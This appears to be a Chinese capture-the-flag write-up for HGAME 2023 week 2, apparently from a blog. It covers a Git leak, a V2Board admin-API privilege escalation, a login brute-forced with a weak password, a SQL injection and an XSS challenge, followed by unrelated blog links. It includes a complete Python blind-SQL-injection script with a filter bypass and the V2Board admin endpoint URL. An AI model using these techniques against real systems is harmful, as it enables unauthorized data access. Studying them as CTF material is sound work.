Git Leakage

Githack一波带走,下载得到flag

v2board

搜索得知V2Board存在越权漏洞,随便注册个账号拿到authorization

访问/api/v1/admin/user/fetch?pageSize=10&current=1

拿到token值,hgame{39d580e71705f6abac9a414def74c466}

Search Commodity
弱口令爆破得到密码admin123,登录进去是一个搜索框,很明显是sql注入,bp构造一个
search_id=1$select$*2,fuzz一下,发现好多都被过滤为空,这里给出部分

这里发现大写能够绕过过滤,我们写一个盲注脚本

import requests

import string

strs = string.printable

headers = {

    'Cookie': 'SESSION=MTY3MzY2MDExM3xEdi1CQkFFQ180SUFBUkFCRUFBQUpQLUNBQUVHYzNSeWFXNW5EQVlBQkhWelpYSUdjM1J5YVc1bkRBZ0FCblZ6WlhJd01RPT18adCvaHER65QoUwkQqK1elOtFjUAT9stHSgpZfPrUWik='

}

flag = ''

def attack(url):

    global flag

    for i in range(1, 100):

        for j in strs:

            if j == '%':

                continue

            tmp = ord(j)

            payload = 'DATABASE()'

            payload1 = 'SELECT(GROUP_CONCAT(TABLE_NAME))FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA)like(DATABASE())'

            payload2 = "SELECT(GROUP_CONCAT(COLUMN_NAME))FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME)like('5ecret15here')"

            payload3 = 'SELECT(f14gggg1shere)FROM(5ecret15here)'

            data = {

                'search_id': f"0||((ascii(substr(({payload3}),{i},1)))like({tmp}))"

            }

            r = requests.post(url, data=data, headers=headers)

            if 'hard disk' in r.text:

                flag += j

                print(flag)

                break

        if flag.endswith('}'):

            break

if __name__ == '__main__':

    url = 'http://week-2.hgame.lwsec.cn:32034/search'

    attack(url)
最后flag为:hgame{4_M4n_WH0_Kn0ws_We4k-P4ssW0rd_And_SQL!}
Designer
附件下载下来是一套js源码,看index.js,/user/register伪造ip无果,应该是xss

我们写一个xhr请求,让本地来访问就能成功伪造ip,得到true flag

利用在线xss_platform,把代码丢里头,Box shadow里填入xss攻击payload,注意这里要闭合下标签,
这里有个坑,得先preview一下再share,才能触发本地访问,不知道是不是就我一个人有这个问题

最后我们在vps的web日志里找到请求信息,本想直接输出来着,但没成功

jwt解密得到flag

HGAME2023_WP_WEEK2的更多相关文章

随机推荐

  1. DevExpress中GridControl控件焦点改变时触发事件

    FocusedRowObjectChanged 事件.可以在焦点改变一行的时候触发对应的事件. 做一个记录 大家如果有问题可以 Console.WriteLine("加群"+&qu ...

  2. vue3响应式原理以及ref和reactive区别还有vue2/3生命周期的对比,第二天

    前言: 前天我们学了 ref 和 reactive ,提到了响应式数据和 Proxy ,那我们今天就来了解一下,vue3 的响应式 在了解之前,先复习一下之前 vue2 的响应式原理 vue2 的响应 ...

  3. 初次邂逅 EasyExcel

    前言 由于工作原因,有这种需求,就是把数据库中的数据导出成 Excel 表格,同时,也得支持人家用 Excel 表格导入数据到数据库.当前项目也是在用 EasyExcel,所以我不得不学啦! 以前学习 ...

  4. 打印九九乘法表,打印金字塔-java

    /** * *** ***** 打印如图金字塔 *=i*2-1 (竖)空格数=列数-1 */ public class Circulate{ public static void main(Strin ...

  5. SpringCloud Alibaba(六) - Seata 分布式事务锁

    1.Seata 简介 1.1 Seata是什么 Seata 是一款开源的分布式事务解决方案,致力于提供高性能和简单易用的分布式事务服务.Seata 将为用户提供了 AT.TCC.SAGA 和 XA 事 ...

  6. 关于Qt的QPixmap中不支持jpg文件格式的问题

    问题 Qt部分版本存在不支持jpg,JPEG等图像格式的问题 qDebug()<<QImageWriter::supportedImageFormats(); 这行代码可以查看所支持的图像 ...

  7. 【SQL真题】SQL3:每类视频近一个月的转发量/率

    题目: https://www.nowcoder.com/practice/a78cf92c11e0421abf93762d25c3bfad?tpId=268&tqId=2285068& ...

  8. 干电池升压IC或者干电池升压芯片

    1, 干电池升压IC                            升压输出3V,3,3V,5V等3V-5V可调 2, 单节锂电池升压IC                     升压输出4. ...

  9. 文件压缩和vi编辑器

    一.压缩,解压缩 1.gzip 和 bzip2 gzip和bzip都是压缩软件,比如windows里的好压和360 压缩或微软自带的等等 命令格式是:gzip或者bzip  + 0-9的压缩等级(数字 ...

  10. python循环结构之while循环

    在python中,除了for循环,还有一个while循环 for循环:循环次数是明确了的 while循环:循环次数不确定,循环停止条件由用户自定义 # while语句结构 while 判断条件: 执行 ...